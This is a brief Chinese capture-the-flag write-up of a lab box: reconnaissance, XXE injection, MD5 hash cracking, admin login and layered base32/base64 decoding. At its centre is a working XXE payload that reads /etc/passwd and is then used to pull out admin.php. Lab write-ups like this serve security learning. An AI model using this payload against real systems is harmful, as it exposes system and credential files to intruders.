一、 收集資訊
存活主機
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsICM38FdsYkRGZkRG9lcvx2bjxiNx8VZ6l2csAzdy0EeFdUYohmMMBjVtJWd0ckW65UbM5WOHJWa5kHT20ESjBjUIF2X0hXZ0xCMx81dvRWYoNHLrdEZwZ1Rh5WNXp1bwNjW1ZUba9VZwlHdssmch1mclRXY39CXldWYtlWPzNXZj9mcw1ycz9WL49zZuBnLzATMxIDOygTMwEDOwkTMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
開放端口
存在注入
Post包裡面添加
<?xml version=“1.0″ encoding=“UTF-8″?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<root><name>&admin;</name><password>1</password></root>
注出admin.php頁面,然後base64解密
得到賬号密碼
解密e6e061838856bf47e1de730719fb2609 [email protected]
賬号:administhebest
登陸
得到flag
先進行base32解密,再進行base64解密。
讀取這個檔案看一看
解碼
這。。。。看起來像php?複制下來儲存到本地,命名為1.php,放到wamp中通路一波